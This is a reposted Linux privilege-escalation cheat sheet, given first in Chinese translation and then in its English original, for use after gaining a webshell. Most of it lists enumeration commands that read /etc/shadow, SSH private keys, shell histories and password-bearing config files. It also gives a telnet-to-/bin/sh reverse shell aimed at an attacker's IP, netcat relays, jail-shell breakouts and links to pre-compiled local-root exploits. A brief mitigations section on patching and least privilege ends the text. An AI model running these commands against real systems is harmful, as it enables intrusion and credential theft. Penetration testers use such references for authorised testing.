linux提权命令 linux服务器提权命令

linux提权命令 linux服务器提权命令

在拿到一个 webshell 之后,大家首先会想到去把自己的权限提升到最高,windows 我们会提升到 SYSTEM 权限,而 Linux 我们会提升到 root 权限,拿在进行 Linux 提权的时候我们要进行哪些操作呢?需要了解哪些信息?使用什么样的命令?这些就是本文的重点。

关于Linux权限提升,有下面几个步骤:

信息收集:尽量收集更多的关于系统的信息。

数据分析:通过把收集到的数据以及信息进行分析,提取其中对我们提升权限有用的信息备用。

搜索:要知道我们需要搜索什么以及去哪里找对应的 exp 。

对症下药:修改我们搜索到的 exp ,针对不同的系统不同的情况做针对性的修改。

尝试:万事俱备,只欠东风,最后一步就是验收结果的时候了,有没有用在此一搏。

操作系统信息收集

如何查看服务器的版本?

cat /etc/issue

cat /etc/*-release

 cat /etc/lsb-release      # 基于 Debian

 cat /etc/redhat-release   # 基于 Redhat

如何查看内核的版本信息?

cat /proc/version

uname -a

uname -mrs

rpm -q kernel

dmesg | grep Linux

ls /boot | grep vmlinuz-

环境变量里的信息如何查看?

cat /etc/profile

cat /etc/bashrc

cat ~/.bash_profile

cat ~/.bashrc

cat ~/.bash_logout

env

set

是否有打印机?

lpstat -a

应用和服务信息

有什么服务在运行?是以什么样的权限在运行?

ps aux

ps -ef

top

cat /etc/services

关注一下以 root 权限运行的服务,有可能对我们提权有帮助。

ps aux | grep root

ps -ef | grep root

安装了哪些应用?版本是啥?当前是否在运行?

ls -alh /usr/bin/

ls -alh /sbin/

dpkg -l

rpm -qa

ls -alh /var/cache/apt/archivesO

ls -alh /var/cache/yum/

常见的配置文件有哪些?有没有可被攻击的插件安装?

cat /etc/syslog.conf

cat /etc/chttp.conf

cat /etc/lighttpd.conf

cat /etc/cups/cupsd.conf

cat /etc/inetd.conf

cat /etc/apache2/apache2.conf

cat /etc/my.conf

cat /etc/httpd/conf/httpd.conf

cat /opt/lampp/etc/httpd.conf

ls -aRl /etc/ | awk ‘$1 ~ /^.r./

有什么工作任务计划?

crontab -l

ls -alh /var/spool/cron

ls -al /etc/ | grep cron

ls -al /etc/cron*

cat /etc/cron*

cat /etc/at.allow

cat /etc/at.deny

cat /etc/cron.allow

cat /etc/cron.deny

cat /etc/crontab

cat /etc/anacrontab

cat /var/spool/cron/crontabs/root

如何查找系统内跟用户名和密码相关的文件?

grep -i user [filename]

grep -i pass [filename]

grep -C 5 “password” [filename]

find . -name “*.php” -print0 | xargs -0 grep -i -n “var $password”   # Joomla

网络通讯相关

系统内是否存在NIC?是否连接这其他网络?

/sbin/ifconfig -a

cat /etc/network/interfaces

cat /etc/sysconfig/network

网络配置信息在哪?

cat /etc/resolv.conf

cat /etc/sysconfig/network

cat /etc/networks

iptables -L

hostname

dnsdomainname

与哪些主机在通讯?

lsof -i

lsof -i :80

grep 80 /etc/services

netstat -antup

netstat -antpx

netstat -tulpn

chkconfig –list

chkconfig –list | grep 3:on

last

w

有哪些关于 IP 和 MAC 地址的缓存?

arp -e

route

/sbin/route -nee

如何抓取流量?怎么看?

tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21

注意:tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

如何得到一个 shell 连接?你可以与系统交互吗?

nc -lvp 4444    # 在攻击者的 PC 上执行

nc -lvp 4445    # 在受害者的 PC 上执行

telnet [atackers ip] 4444 | /bin/sh | telnet [local ip] 4445  # 在受害者的 PC 上执行

其他姿势参见:linux下反弹shell的姿势

如何进行端口转发?

参考文章:穿越边界的姿势

其他姿势请自行探索

如何使用隧道执行命令?

ssh -D 127.0.0.1:9050 -N [username]@[ip]

proxychains ifconfig

跟用户相关的信息

我是谁?谁登入了?谁登入过?等

id

who

w

last

cat /etc/passwd | cut -d: -f1    # 列出用户

grep -v -E “^#” /etc/passwd | awk -F: ‘$3 == 0 { print $1}’   # 列出超级用户

awk -F: ‘($3 == “0”) {print}’ /etc/passwd   # 列出超级用户

cat /etc/sudoers

sudo -l

有哪些敏感文件?

cat /etc/passwd

cat /etc/group

cat /etc/shadow

ls -alh /var/mail/

根目录如果可以访问,有哪些有趣的东西?

ls -ahlR /root/

ls -ahlR /home/

可能存在密码的文件?

cat /var/apache2/config.inc

cat /var/lib/mysql/mysql/user.MYD

cat /root/anaconda-ks.cfg

用户做了什么?

cat ~/.bash_history

cat ~/.nano_history

cat ~/.atftp_history

cat ~/.mysql_history

cat ~/.php_history

有关用户的信息在哪?

cat ~/.bashrc

cat ~/.profile

cat /var/mail/root

cat /var/spool/mail/root

私钥在什么地方?

cat ~/.ssh/authorized_keys

cat ~/.ssh/identity.pub

cat ~/.ssh/identity

cat ~/.ssh/id_rsa.pub

cat ~/.ssh/id_rsa

cat ~/.ssh/id_dsa.pub

cat ~/.ssh/id_dsa

cat /etc/ssh/ssh_config

cat /etc/ssh/sshd_config

cat /etc/ssh/ssh_host_dsa_key.pub

cat /etc/ssh/ssh_host_dsa_key

cat /etc/ssh/ssh_host_rsa_key.pub

cat /etc/ssh/ssh_host_rsa_key

cat /etc/ssh/ssh_host_key.pub

cat /etc/ssh/ssh_host_key

文件系统

/etc/ 下有哪些文件可写,哪些服务可以被重新配置?

ls -aRl /etc/ | awk ‘$1 ~ /^.w./’ 2>/dev/null     # Anyone

ls -aRl /etc/ | awk ‘$1 ~ /^..w/’ 2>/dev/null       # Owner

ls -aRl /etc/ | awk ‘$1 ~ /^…..w/’ 2>/dev/null    # Group

ls -aRl /etc/ | awk ‘/’ 2>/dev/null        # Other

find /etc/ -readable -type f 2>/dev/null               # Anyone

find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

在 /var/ 下我们能发现什么?

ls -alh /var/log

ls -alh /var/mail

ls -alh /var/spool

ls -alh /var/spool/lpd

ls -alh /var/lib/pgsql

ls -alh /var/lib/mysql

cat /var/lib/dhcp3/dhclient.leases

在网站的目录下有没有隐藏文件?

ls -alhR /var/www/

ls -alhR /srv/www/htdocs/

ls -alhR /usr/local/www/apache22/data/

ls -alhR /opt/lampp/htdocs/

ls -alhR /var/www/html/

有哪些日志文件?

cat /etc/httpd/logs/access_log

cat /etc/httpd/logs/access.log

cat /etc/httpd/logs/error_log

cat /etc/httpd/logs/error.log

cat /var/log/apache2/access_log

cat /var/log/apache2/access.log

cat /var/log/apache2/error_log

cat /var/log/apache2/error.log

cat /var/log/apache/access_log

cat /var/log/apache/access.log

cat /var/log/auth.log

cat /var/log/chttp.log

cat /var/log/cups/error_log

cat /var/log/dpkg.log

cat /var/log/faillog

cat /var/log/httpd/access_log

cat /var/log/httpd/access.log

cat /var/log/httpd/error_log

cat /var/log/httpd/error.log

cat /var/log/lastlog

cat /var/log/lighttpd/access.log

cat /var/log/lighttpd/error.log

cat /var/log/lighttpd/lighttpd.access.log

cat /var/log/lighttpd/lighttpd.error.log

cat /var/log/messages

cat /var/log/secure

cat /var/log/syslog

cat /var/log/wtmp

cat /var/log/xferlog

cat /var/log/yum.log

cat /var/run/utmp

cat /var/webmin/miniserv.log

cat /var/www/logs/access_log

cat /var/www/logs/access.log

ls -alh /var/lib/dhcp3/

ls -alh /var/log/postgresql/

ls -alh /var/log/proftpd/

ls -alh /var/log/samba/

值得注意的: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp

如果命令执行被监视怎么办?

python -c ‘import pty;pty.spawn(“/bin/bash”)’

echo os.system(‘/bin/bash’)

/bin/sh -i

文件系统如何安装?

mount

df -h

是否有未安装的文件系统?

cat /etc/fstab

有哪些 “ 高级的 Linux 文件权限 ” 在使用?

find / -perm -1000 -type d 2>/dev/null   # Sticky bit – 只有目录的所有者或文件的所有者才能删除或重命名。

find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) – 作为组运行,而不是启动它的用户。

find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) – 作为所有者运行,而不是启动它的用户。

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID

for i in locate -r "bin$"; do find $i ( -perm -4000 -o -perm -2000 ) -type f 2>/dev/null; done    # 查找常见位置中用于 SGID 或 SUID 的文件

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null # 从根开始查找所有的 SUID 不包括符号链接,并且只搜索三层

如何查找可写可执行的目录?

find / -writable -type d 2>/dev/null      # 可写目录

find / -perm -222 -type d 2>/dev/null     # 可写目录

find / -perm -o w -type d 2>/dev/null     # 可写目录

find / -perm -o x -type d 2>/dev/null     # 可执行目录

find / ( -perm -o w -perm -o x ) -type d 2>/dev/null

如何查找可能存在问题的文件?

find / -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -print   # 可写的文件

find /dir -xdev ( -nouser -o -nogroup ) -print # 没有归属的文件

寻找可利用的漏洞

安装支持哪些工具和语言?

find / -name perl*

find / -name python*

find / -name gcc*

find / -name cc

能够用于上传的软件有那些?

find / -name wget

find / -name nc*

find / -name netcat*

find / -name tftp*

find / -name ftp

查找 exploit 的网站:

http://www.exploit-db.com

http://1337day.com

http://www.securiteam.com

http://www.securityfocus.com

http://www.exploitsearch.net

http://metasploit.com/modules/

http://securityreason.com

http://seclists.org/fulldisclosure/

http://www.google.com

有关漏洞的更多信息?

http://www.cvedetails.com

http://packetstormsecurity.org/files/cve/[CVE]

http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]

http://www.vulnview.com/cve-details.php?cvename=[CVE]

应急措施

针对以上提到的所有命令,执行收集一下信息,看能否找到可以利用的点,然后针对可利用的点进行升级或者使用一些安全产品来做防护,使用如下命令进行升级:

apt-get update && apt-get upgrade

yum update

一些运行权限的问题?比如 mysql 是否是用 root 权限运行的?

原文(英文)

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Basic Linux Privilege Escalation

Before starting, I would like to point out – I’m no expert. As far as I know, there isn’t a “magic” answer, in this huge area. This is simply my finding, typed up, to be shared (my starting point). Below is a mixture of commands to do the same thing, to look at things in a different place or just a different light. I know there more “things” to look for. It’s just a basic & rough guide. Not every command will work for each system as Linux varies so much. “It” will not jump off the screen – you’ve to hunt for that “little thing” as “the devil is in the detail“.

Enumeration is the key.

(Linux) privilege escalation is all about:

  • Collect – Enumeration, more enumeration and some more enumeration.
  • Process – Sort through data, analyse and prioritisation.
  • Search – Know what to search for and where to find the exploit code.
  • Adapt – Customize the exploit, so it fits. Not every exploit work for every system “out of the box”.
  • Try – Get ready for (lots of) trial and error.

Operating System

What’s the distribution type? What version?

1 2 3 4cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian based cat /etc/redhat-release # Redhat based

What’s the kernel version? Is it 64-bit?

1 2 3 4 5 6cat /proc/version uname -a uname -mrs rpm -q kernel dmesg | grep Linux ls /boot | grep vmlinuz-

What can be learnt from the environmental variables?

1 2 3 4 5 6 7cat /etc/profile cat /etc/bashrc cat ~/.bash_profile cat ~/.bashrc cat ~/.bash_logout env set

Is there a printer?

1lpstat -a

Applications & Services

What services are running? Which service has which user privilege?

1 2 3 4ps aux ps -ef top cat /etc/services

Which service(s) are been running by root? Of these services, which are vulnerable – it’s worth a double check!

1 2ps aux | grep root ps -ef | grep root

What applications are installed? What version are they? Are they currently running?

1 2 3 4 5 6ls -alh /usr/bin/ ls -alh /sbin/ dpkg -l rpm -qa ls -alh /var/cache/apt/archivesO ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?

1 2 3 4 5 6 7 8 9 10cat /etc/syslog.conf cat /etc/chttp.conf cat /etc/lighttpd.conf cat /etc/cups/cupsd.conf cat /etc/inetd.conf cat /etc/apache2/apache2.conf cat /etc/my.conf cat /etc/httpd/conf/httpd.conf cat /opt/lampp/etc/httpd.conf ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

What jobs are scheduled?

1 2 3 4 5 6 7 8 9 10 11 12crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?

1 2 3 4grep -i user [filename] grep -i pass [filename] grep -C 5 "password" [filename] find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla

Communications & Networking

What NIC(s) does the system have? Is it connected to another network?

1 2 3/sbin/ifconfig -a cat /etc/network/interfaces cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?

1 2 3 4 5 6cat /etc/resolv.conf cat /etc/sysconfig/network cat /etc/networks iptables -L hostname dnsdomainname

What other users & hosts are communicating with the system?

1 2 3 4 5 6 7 8 9 10lsof -i lsof -i :80 grep 80 /etc/services netstat -antup netstat -antpx netstat -tulpn chkconfig --list chkconfig --list | grep 3:on last w

Whats cached? IP and/or MAC addresses

1 2 3arp -e route /sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic

1tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21

Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]

Have you got a shell? Can you interact with the system?

1 2 3nc -lvp 4444 # Attacker. Input (Commands) nc -lvp 4445 # Attacker. Ouput (Results) telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!

Note: http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

Is port forwarding possible? Redirect and interact with traffic from another view

Note: http://www.boutell.com/rinetd/

Note: http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

Note: http://downloadcenter.mcafee.com/products/tools/foundstone/fpipe2_1.zip

Note: FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]

1FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

Note: ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]

1 2ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port

Note: mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe

1 2 3mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 >backpipe # Port Relay mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080) mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)

Is tunnelling possible? Send commands locally, remotely

1 2ssh -D 127.0.0.1:9050 -N [username]@[ip] proxychains ifconfig

Confidential Information & Users

Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?

1 2 3 4 5 6 7 8 9id who w last cat /etc/passwd | cut -d: -f1 # List of users grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users awk -F: '($3 == "0") {print}' /etc/passwd # List of super users cat /etc/sudoers sudo -l

What sensitive files can be found?

1 2 3 4cat /etc/passwd cat /etc/group cat /etc/shadow ls -alh /var/mail/

Anything “interesting” in the home directorie(s)? If it’s possible to access

1 2ls -ahlR /root/ ls -ahlR /home/

Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords

1 2 3cat /var/apache2/config.inc cat /var/lib/mysql/mysql/user.MYD cat /root/anaconda-ks.cfg

What has the user being doing? Is there any password in plain text? What have they been edting?

1 2 3 4 5cat ~/.bash_history cat ~/.nano_history cat ~/.atftp_history cat ~/.mysql_history cat ~/.php_history

What user information can be found?

1 2 3 4cat ~/.bashrc cat ~/.profile cat /var/mail/root cat /var/spool/mail/root

Can private-key information be found?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat ~/.ssh/identity cat ~/.ssh/id_rsa.pub cat ~/.ssh/id_rsa cat ~/.ssh/id_dsa.pub cat ~/.ssh/id_dsa cat /etc/ssh/ssh_config cat /etc/ssh/sshd_config cat /etc/ssh/ssh_host_dsa_key.pub cat /etc/ssh/ssh_host_dsa_key cat /etc/ssh/ssh_host_rsa_key.pub cat /etc/ssh/ssh_host_rsa_key cat /etc/ssh/ssh_host_key.pub cat /etc/ssh/ssh_host_key

File Systems

Which configuration files can be written in /etc/? Able to reconfigure a service?

1 2 3 4 5 6 7ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other find /etc/ -readable -type f 2>/dev/null # Anyone find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone

What can be found in /var/ ?

1 2 3 4 5 6 7ls -alh /var/log ls -alh /var/mail ls -alh /var/spool ls -alh /var/spool/lpd ls -alh /var/lib/pgsql ls -alh /var/lib/mysql cat /var/lib/dhcp3/dhclient.leases

Any settings/files (hidden) on website? Any settings file with database information?

1 2 3 4 5ls -alhR /var/www/ ls -alhR /srv/www/htdocs/ ls -alhR /usr/local/www/apache22/data/ ls -alhR /opt/lampp/htdocs/ ls -alhR /var/www/html/

Is there anything in the log file(s) (Could help with “Local File Includes”!)

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40cat /etc/httpd/logs/access_log cat /etc/httpd/logs/access.log cat /etc/httpd/logs/error_log cat /etc/httpd/logs/error.log cat /var/log/apache2/access_log cat /var/log/apache2/access.log cat /var/log/apache2/error_log cat /var/log/apache2/error.log cat /var/log/apache/access_log cat /var/log/apache/access.log cat /var/log/auth.log cat /var/log/chttp.log cat /var/log/cups/error_log cat /var/log/dpkg.log cat /var/log/faillog cat /var/log/httpd/access_log cat /var/log/httpd/access.log cat /var/log/httpd/error_log cat /var/log/httpd/error.log cat /var/log/lastlog cat /var/log/lighttpd/access.log cat /var/log/lighttpd/error.log cat /var/log/lighttpd/lighttpd.access.log cat /var/log/lighttpd/lighttpd.error.log cat /var/log/messages cat /var/log/secure cat /var/log/syslog cat /var/log/wtmp cat /var/log/xferlog cat /var/log/yum.log cat /var/run/utmp cat /var/webmin/miniserv.log cat /var/www/logs/access_log cat /var/www/logs/access.log ls -alh /var/lib/dhcp3/ ls -alh /var/log/postgresql/ ls -alh /var/log/proftpd/ ls -alh /var/log/samba/ Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp

Note: http://www.thegeekstuff.com/2011/08/linux-var-log-files/

If commands are limited, you break out of the “jail” shell?

1 2 3python -c 'import pty;pty.spawn("/bin/bash")' echo os.system('/bin/bash') /bin/sh -i

How are file-systems mounted?

1 2mount df -h

Are there any unmounted file-systems?

1cat /etc/fstab

What “Advanced Linux File Permissions” are used? Sticky bits, SUID & GUID

1 2 3 4 5 6 7 8 9find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here. find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it. find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it. find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search) # find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied) find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null

Where can written to and executed from? A few ‘common’ places: /tmp, /var/tmp, /dev/shm

1 2 3 4 5 6 7find / -writable -type d 2>/dev/null # world-writeable folders find / -perm -222 -type d 2>/dev/null # world-writeable folders find / -perm -o w -type d 2>/dev/null # world-writeable folders find / -perm -o x -type d 2>/dev/null # world-executable folders find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders

Any “problem” files? Word-writeable, “nobody” files

1 2find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable files find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files

Preparation & Finding Exploit Code

What development tools/languages are installed/supported?

1 2 3 4find / -name perl* find / -name python* find / -name gcc* find / -name cc

How can files be uploaded?

1 2 3 4 5find / -name wget find / -name nc* find / -name netcat* find / -name tftp* find / -name ftp

Finding exploit code

http://www.exploit-db.com

http://1337day.com

http://www.securiteam.com

http://www.securityfocus.com

http://www.exploitsearch.net

http://metasploit.com/modules/

http://securityreason.com

http://seclists.org/fulldisclosure/

http://www.google.com

Finding more information regarding the exploit

http://www.cvedetails.com

http://packetstormsecurity.org/files/cve/[CVE]

http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]

http://www.vulnview.com/cve-details.php?cvename=[CVE]

(Quick) “Common” exploits. Warning. Pre-compiled binaries files. Use at your own risk

http://web.archive.org/web/20111118031158/http://tarantula.by.ru/localroot/

http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/

Mitigations

Is any of the above information easy to find?

Try doing it! Setup a cron job which automates script(s) and/or 3rd party products

Is the system fully patched?

Kernel, operating system, all applications, their plugins and web services

1 2apt-get update && apt-get upgrade yum update

Are services running with the minimum level of privileges required?

For example, do you need to run MySQL as root?

Scripts Can any of this be automated?!

http://pentestmonkey.net/tools/unix-privesc-check/

http://labs.portcullis.co.uk/application/enum4linux/

http://bastille-linux.sourceforge.net

Other (quick) guides & Links

Enumeration

http://www.0daysecurity.com/penetration-testing/enumeration.html

http://www.microloft.co.uk/hacking/hacking3.htm

Misc

http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf

http://pentest.cryptocity.net/files/operations/2009/post_exploitation_fall09.pdf

http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html

此文章来源于
https://www.ddosi.com/2017/10/28/linux/
2018年以前网站服务器的备份,当时决定不要了,删了所有东西,现在还原一下(有些图片挂了,永远找不回来了,sorry)